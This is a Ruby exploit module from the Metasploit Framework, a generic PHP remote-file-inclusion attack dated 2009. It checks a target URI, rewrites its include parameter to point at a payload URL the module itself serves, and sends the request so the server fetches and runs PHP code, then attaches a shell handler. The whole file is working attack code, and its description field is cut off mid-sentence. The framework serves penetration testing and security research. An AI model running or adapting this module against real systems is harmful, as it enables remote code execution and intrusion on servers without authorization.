## # $Id: php_include.rb 7724 2009-12-06 05:50:37Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::PHPInclude def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Include Generic Exploit', 'Description' => %q{ Exploits things like }, 'Author' => [ 'hdm' , 'egypt' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 7724 $', 'References' => [ ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, 'Space' => 32768, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options( [ OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/test.php?path=!URL!"]), ], self.class) end def check uri = datastore['PHPURI'].gsub(/\?.*/, "") print_status("Checking uri #{uri}") response = send_request_raw({ 'uri' => uri}) if response.code == 200 return Exploit::CheckCode::Detected end print_error("Server responded with #{response.code}") return Exploit::CheckCode::Safe end def php_exploit # very short timeout because the request may never return if we're # sending a socket payload timeout = 0.01 uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%")) print_status("Trying uri #{uri}") # The option {'global' => true} is required to make findsock payloads work response = send_request_raw( { 'global' => true, 'uri' => uri, },timeout) if response and response.code != 200 print_error("Server returned non-200 status code (#{response.code})") end handler end end